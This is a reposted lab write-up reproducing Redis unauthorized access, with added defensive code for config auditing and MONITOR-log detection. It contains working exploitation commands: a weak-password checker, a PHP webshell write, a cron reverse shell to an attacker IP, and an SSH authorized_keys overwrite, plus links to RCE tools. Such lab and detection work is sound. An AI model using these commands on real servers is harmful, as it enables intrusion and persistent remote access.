Reproducing Redis unauthorized access

Redis unauthorized access

1. Environment setup

wget http://download.redis.io/releases/redis-3.2.11.tar.gz

tar zxvf redis-3.2.11.tar.gz

cd redis-3.2.11

make

If make is missing: apt install make

// Ignore the above; my environment does not allow it, so I am trying CentOS instead.

2. Environment setup (1)

wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make
vim redis.conf
Comment out "bind 127.0.0.1" by prefixing it with #, and set protected-mode to no
./src/redis-server redis.conf
firewall-cmd --zone=public --add-port=6379/tcp --permanent
firewall-cmd --reload
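The two edits to redis.conf above (commenting out bind and setting protected-mode to no) are exactly what makes the instance reachable from the network without a password. The following Python, added here and not part of the original post, audits a redis.conf text for those two settings plus the two that would have stopped the later steps: requirepass and a renamed CONFIG command. Both sample configs are constructed; the directive names are the real redis.conf ones, but the hardened values (the placeholder password, which commands to rename) are assumptions for the example.

```python
# Added example, not from the original post: audit a redis.conf for the
# settings this write-up weakens. Assumes the stock redis.conf layout
# ("directive value" per line, "#" comments); sample configs are constructed.

# Constructed sample: the lab config after the edits described above
LAB_CONF = """\
# bind 127.0.0.1
protected-mode no
port 6379
"""

# Constructed sample: a hardened config for comparison (values are placeholders)
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE_ME_placeholder
rename-command CONFIG ""
rename-command SAVE ""
"""


def parse_conf(text):
    """Return {directive: [value, ...]} from redis.conf text, ignoring comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1] if len(parts) > 1 else ''
        conf.setdefault(key, []).append(value)
    return conf


def audit_conf(text):
    """Return a list of findings; an empty list means no check fired."""
    conf = parse_conf(text)
    findings = []
    # 1. No bind line (or a wildcard bind) means Redis listens on every interface
    if 'bind' not in conf:
        findings.append('no bind directive: Redis listens on all interfaces')
    elif any('0.0.0.0' in v or v.strip() == '*' for v in conf['bind']):
        findings.append('bind exposes Redis on all interfaces')
    # 2. protected-mode no disables the no-password/all-interfaces safeguard
    if conf.get('protected-mode', ['yes'])[-1].lower() == 'no':
        findings.append('protected-mode is off')
    # 3. Without requirepass every client that can connect is fully trusted
    if 'requirepass' not in conf:
        findings.append('no requirepass: unauthenticated clients accepted')
    # 4. CONFIG SET dir/dbfilename is what the later steps rely on; renaming
    #    CONFIG to "" disables it entirely
    renamed = {v.split()[0].upper() for v in conf.get('rename-command', []) if v.split()}
    if 'CONFIG' not in renamed:
        findings.append('CONFIG command not renamed/disabled')
    return findings


if __name__ == '__main__':
    for name, text in (('lab', LAB_CONF), ('hardened', HARDENED_CONF)):
        print(name, audit_conf(text) or ['ok'])
```

Run against the lab config it reports all four findings; against the hardened one it reports none. Note that protected-mode only protects an instance that has no password and no bind; once bind is commented out and protected-mode is off, requirepass and a disabled CONFIG are the remaining controls.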

3. Vulnerability detection

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import sys

PASSWORD_DIC = ['redis', 'root', 'oracle', 'password', 'p@aaw0rd', 'abc123!', '123456', 'admin']


def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        # INFO without AUTH: an open instance answers with its version banner,
        # a password-protected one answers "-NOAUTH Authentication required."
        s.send(b"INFO\r\n")
        result = s.recv(1024).decode('utf-8', 'ignore')
        s.close()
        if "redis_version" in result:
            return u"未授权访问"
        elif "Authentication" in result:
            # requirepass is set: try each entry of the password list
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send(("AUTH %s\r\n" % pass_).encode('utf-8'))
                result = s.recv(1024).decode('utf-8', 'ignore')
                s.close()
                if '+OK' in result:
                    return u"存在弱口令,密码:%s" % pass_
    except Exception as e:
        return "error: %s" % e
    return None


if __name__ == '__main__':
    ip = sys.argv[1]
    port = sys.argv[2]
    print(check(ip, port, timeout=10))
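The script above decides by substring matching on the first 1024 bytes. A reply that happens to be split across reads, or an error other than NOAUTH, is silently misclassified. The following Python, added here and not from the original post, parses the reply in Redis's RESP wire format (+status, -error, :integer, $bulk) and maps it onto a verdict, treating a truncated reply as an explicit failure instead of a miss. The sample replies are constructed, not captured from a server.

```python
# Added example, not from the original post: classify the reply to INFO by
# parsing RESP rather than grepping the raw bytes. Sample replies are constructed.


def parse_resp(data):
    """Parse one RESP reply. Returns (kind, payload) with kind in
    'status', 'error', 'integer', 'bulk', 'null'. Raises ValueError on
    malformed or truncated input so the caller never guesses."""
    if not data or b'\r\n' not in data:
        raise ValueError('truncated reply')
    head, _, rest = data.partition(b'\r\n')
    marker, body = head[:1], head[1:]
    if marker == b'+':
        return 'status', body.decode('utf-8', 'replace')
    if marker == b'-':
        return 'error', body.decode('utf-8', 'replace')
    if marker == b':':
        return 'integer', int(body)
    if marker == b'$':
        length = int(body)
        if length == -1:
            return 'null', None
        if len(rest) < length + 2:          # payload plus its trailing CRLF
            raise ValueError('truncated bulk reply')
        return 'bulk', rest[:length].decode('utf-8', 'replace')
    raise ValueError('unsupported reply type %r' % marker)


def classify_info_reply(data):
    """Map the reply to an unauthenticated INFO onto a security verdict."""
    kind, payload = parse_resp(data)
    if kind == 'bulk' and 'redis_version' in payload:
        return 'unauthenticated'            # INFO answered without AUTH
    if kind == 'error' and payload.startswith('NOAUTH'):
        return 'auth_required'              # requirepass is set
    if kind == 'error':
        return 'error:' + payload.split(' ')[0]
    return 'unexpected'


def bulk(body):
    """Wrap raw bytes as a RESP bulk string (used to build the samples)."""
    return b'$%d\r\n%s\r\n' % (len(body), body)


# Constructed samples: what an open instance and a password-protected one answer
INFO_OPEN = bulk(b'# Server\r\nredis_version:3.2.0\r\nredis_mode:standalone\r\n')
INFO_NOAUTH = b'-NOAUTH Authentication required.\r\n'

if __name__ == '__main__':
    print(classify_info_reply(INFO_OPEN))     # unauthenticated
    print(classify_info_reply(INFO_NOAUTH))   # auth_required
```

To use it on the wire, read until the bulk length announced in the $ header has arrived and then call classify_info_reply; the ValueError on a short read is the signal to keep reading rather than to report "not vulnerable".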

4. Exploitation

4.1 Writing a webshell

redis-cli -h 192.168.164.147
config set dir /var/www/html/
config set dbfilename shell.php
set webshell "<?php phpinfo(); ?>"
save

4.2 Reverse shell

nc -lvnp 7999
set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

4.3 Writing an SSH public key

Generate an SSH key pair on Kali

ssh-keygen -t rsa
cat id_rsa.pub
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/AxH3PNJW2moAmp5rZn4rRpel0BNFNJx3un6aQHAp8MqyL25kC2ugDqjTYOxtAqM9MLySG4UJUn6g6aSZQqv36zh9nBxprIwMUTorxQBnwGjgkTkOVHF241nGnCRGKPMPxGfdAkj/CFd6Esk7jyzqafF6lhzy4tLh2jk2P50qhnMQei7IZigEQOW36oBSAcBD+yZ0tQekozyzg7JJ+8v2XkuCcEvI2K6gSX/29A3BkTXUS/0c4yLw6r5UVDyhcdZDc6qbeqeTyKDeMxCgwqRZV9SZOyorQtya+UUW5AifnEUREYpK4CBlpzs1ek6eE6vgRAZGoJ8BnpkvfDayku5rgqNBbjuIxfq1+nEZInD9JVLjk4hC6ZJk1pypXD2+gxQZeBL9OYOmFx3Onx5A2sqPxh/jDrfiF8s5x3wgcTUQ4BulBWp+qUuj0KjXMN/cOuaa7t2Ame3o3MIaa4axw3OEyaIzlY9V0GRYZlHUkoy5ljF5BUUoFWrm9Gf10jqDnnU= root@kali\n\n\n"
save
ssh -i id_rsa [email protected]
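Sections 4.1 to 4.3 differ only in the payload; on the Redis side they are the same three commands: CONFIG SET dir, CONFIG SET dbfilename, SAVE. That makes the sequence easy to spot in the output of the MONITOR command, which prints every command with its client address. The following Python, added here and not from the original post, tracks the dir/dbfilename pair per client and raises an alert when SAVE lands the dump in a sensitive directory or under a filename that is not an .rdb file. The MONITOR lines are constructed, and the list of sensitive directory prefixes is an assumption to be adapted to the host.

```python
# Added example, not from the original post: detect the CONFIG SET dir +
# CONFIG SET dbfilename + SAVE pattern shared by 4.1-4.3 in MONITOR output.
# Line layout follows MONITOR's '<ts> [<db> <client>] "cmd" "arg" ...';
# sample lines are constructed, directory prefixes are an assumption.
import re
from collections import defaultdict

# Assumed: directories where an attacker-shaped RDB dump becomes trusted input
SENSITIVE_DIR_PREFIXES = ('/var/www', '/var/spool/cron', '/etc/cron', '/root/.ssh', '/home/')

MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')


def split_args(text):
    """Split the quoted argument list of a MONITOR line (handles \\" escapes)."""
    return [a.replace('\\"', '"') for a in re.findall(r'"((?:[^"\\]|\\.)*)"', text)]


def detect(lines):
    """Return [(client, reason)] for clients whose SAVE follows a suspicious
    dir/dbfilename combination. Legitimate dumps (dir outside the sensitive
    prefixes, filename ending in .rdb) produce no alert."""
    state = defaultdict(dict)       # client -> {'dir': ..., 'dbfilename': ...}
    alerts = []
    for line in lines:
        m = MONITOR_RE.match(line)
        if not m:
            continue
        client = m.group('client')
        args = split_args(m.group('args'))
        if not args:
            continue
        cmd = args[0].lower()
        if cmd == 'config' and len(args) >= 4 and args[1].lower() == 'set':
            param = args[2].lower()
            if param in ('dir', 'dbfilename'):
                state[client][param] = args[3]
        elif cmd in ('save', 'bgsave'):
            st = state.get(client, {})
            d, f = st.get('dir', ''), st.get('dbfilename', '')
            reasons = []
            if d.startswith(SENSITIVE_DIR_PREFIXES):
                reasons.append('dir %s' % d)
            if f and not f.endswith('.rdb'):
                reasons.append('dbfilename %s' % f)
            if reasons:
                alerts.append((client, '; '.join(reasons)))
    return alerts


# Constructed MONITOR output: one benign client, one doing the 4.1 sequence,
# and one legitimate CONFIG SET + SAVE from localhost
SAMPLE_MONITOR = """\
1586000000.100000 [0 10.0.0.5:51000] "SET" "counter" "1"
1586000000.200000 [0 10.0.0.9:52000] "config" "set" "dir" "/var/www/html/"
1586000000.300000 [0 10.0.0.9:52000] "config" "set" "dbfilename" "shell.php"
1586000000.400000 [0 10.0.0.9:52000] "set" "webshell" "..."
1586000000.500000 [0 10.0.0.9:52000] "save"
1586000001.000000 [0 127.0.0.1:40000] "CONFIG" "SET" "dir" "/var/lib/redis"
1586000001.100000 [0 127.0.0.1:40000] "CONFIG" "SET" "dbfilename" "dump.rdb"
1586000001.200000 [0 127.0.0.1:40000] "SAVE"
"""

if __name__ == '__main__':
    for client, reason in detect(SAMPLE_MONITOR.splitlines()):
        print('ALERT', client, reason)
```

Keying the state on the client address matters because a single connection performs all three steps; a CONFIG SET from one client followed by a SAVE from another is the normal operator case and should not fire. The same logic applies unchanged to the 4.2 (/var/spool/cron/, root) and 4.3 (/root/.ssh/, authorized_keys) variants.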

4.4 Exploitation scripts

https://github.com/n0b0dyCN/redis-rogue-server

https://github.com/Ridter/redis-rce

5. References

https://www.cnblogs.com/bmjoker/p/9548962.html

https://www.freebuf.com/vuls/223432.html

https://blog.csdn.net/fly_hps/article/details/80937837


Reposted from blog.csdn.net/qq_43645782/article/details/105468173